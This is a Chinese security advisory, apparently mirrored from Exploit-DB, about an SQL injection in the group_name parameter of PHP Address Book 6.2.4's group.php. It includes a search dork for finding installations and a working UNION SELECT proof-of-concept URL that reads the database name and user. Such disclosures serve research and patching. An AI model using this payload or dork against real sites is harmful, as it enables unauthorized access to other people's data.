发布日期：2010-12-29
更新日期：2010-12-29

受影响系统：

sourceforge PHP Address Book 6.2.4

描述：

---

PHP Address Book是基于Web的简单地址簿和号码簿。

PHP-addressbook 6.2.4版本的group.php脚本没有正确过滤 group_name 参数内用户输入，可使攻击者在后端数据库内注入或操作SQL查询。

<*来源：hiphop
  
  链接：http://osvdb.org/show/osvdb/70219
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

PHP-AddressBook 6.2.4 - (group.php) SQL Injection Vulnerability



EDB-ID: 15848     CVE: N/A    OSVDB-ID: 70219
Author: hiphop    Published: 2010-12-29    Verified: Verified
Exploit Code:   Download    Vulnerable App:    Download    
Rating
Overall:

#Exploit Title    :  PHP-AddressBook v6.2.4 SQL INJECTION VULNERABILITIES
#Script   : PHP-AddressBook v6.2.4
#Language : PHP
#DESCRIPTION:Simple, web-based address & phone book, contact manager, organizer. Groups, addresses, e-Mails, phone numbers & birthdays. vCards, LDIF, Excel, iPhone, Gmail & Google-Maps supported
#Download : http://php-addressbook.sourceforge.net/download
#DORK: "php-addressbook"
#Date     : 2010/12/29
#Found    : by hiphop
#thanks :silly3r


proof of concept:

Condition: magic_quotes_gpc = off

http://server/group.php?group_name=1'+union+select+1,2,3,4,5,6,7,concat(database(),0x3a,user()),9'

建议：

---

厂商补丁：

sourceforge
-----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://php-addressbook.sourceforge.net/download

浏览次数：3076
严重程度：0（网友投票）